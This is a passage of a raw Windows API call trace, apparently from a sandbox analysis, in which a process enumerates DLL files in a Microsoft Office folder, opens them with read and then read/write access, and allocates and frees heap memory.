nFileSizeHigh=0x0, nFileSizeLow=0x5ac0)) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1078ffd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.851] AreFileApisANSI () returned 1 [0099.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 78 [0099.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.851] AreFileApisANSI () returned 1 [0099.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cae8 [0099.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8cae8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 78 [0099.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.851] GetFileType (hFile=0x368) returned 0x1 [0099.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.851] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.852] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.852] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.852] CloseHandle (hObject=0x368) returned 1 [0099.852] AreFileApisANSI () returned 1 [0099.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c458 [0099.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 78 [0099.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.852] GetFileType (hFile=0x368) returned 0x1 [0099.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.852] CloseHandle (hObject=0x368) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.853] AreFileApisANSI () returned 1 [0099.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ce30 [0099.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 78 [0099.854] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1078ffd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.854] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd10c55e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0099.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.855] AreFileApisANSI () returned 1 [0099.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 79 [0099.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.855] AreFileApisANSI () returned 1 [0099.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d028 [0099.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8d028, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 79 [0099.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.855] GetFileType (hFile=0x368) returned 0x1 [0099.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0099.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.856] CloseHandle (hObject=0x368) returned 1 [0099.856] AreFileApisANSI () returned 1 [0099.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c5a8 [0099.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 79 [0099.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.856] GetFileType (hFile=0x368) returned 0x1 [0099.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.857] CloseHandle (hObject=0x368) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.857] HeapFree (in: hHeap=0x20000, 